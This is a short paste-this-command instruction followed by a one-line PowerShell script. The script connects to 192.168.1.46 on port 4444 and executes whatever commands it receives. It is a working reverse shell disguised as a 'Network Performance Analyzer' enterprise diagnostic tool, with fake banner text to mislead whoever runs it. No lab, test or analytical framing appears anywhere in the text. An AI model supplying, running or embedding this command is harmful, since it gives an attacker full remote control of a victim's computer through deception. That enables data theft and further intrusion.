Copy and paste this entire command into PowerShell (no file needed):

powershell -Command "$c=New-Object System.Net.Sockets.TCPClient('192.168.1.46',4444);$s=$c.GetStream();$w=New-Object System.IO.StreamWriter($s);$r=New-Object System.IO.StreamReader($s);$w.AutoFlush=$true;$w.WriteLine('Network Performance Analyzer v4.2');$w.WriteLine('Enterprise diagnostic session initiated');$cd=Get-Location;$w.WriteLine(\"Analysis workspace: $cd\");$w.Write(\"NETPERF $cd> \");while($c.Connected){$cmd=$r.ReadLine();if($cmd -eq $null){break};if($cmd -match '^(exit|quit)$'){$w.WriteLine('Session terminated');break};if($cmd.StartsWith('cd ')){$nd=$cmd.Substring(3).Trim();try{if(Test-Path $nd -PathType Container){Set-Location $nd;$cd=Get-Location;$out=\"Workspace: $cd\"}else{$out=\"Path not found: $nd\"}}catch{$out=\"Error: $_\"}}elseif($cmd -eq 'pwd'){$out=$cd.ToString()}else{try{$out=Invoke-Expression $cmd 2>&1|Out-String}catch{$out=\"Error: $_\"}};$w.WriteLine($out);$w.Write(\"`r`nNETPERF $cd> \")};$w.Close();$r.Close();$s.Close();$c.Close()"
